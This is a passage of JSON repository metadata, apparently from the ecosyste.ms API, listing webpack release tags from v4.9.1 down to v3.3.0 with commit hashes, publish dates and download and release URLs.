ull,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/h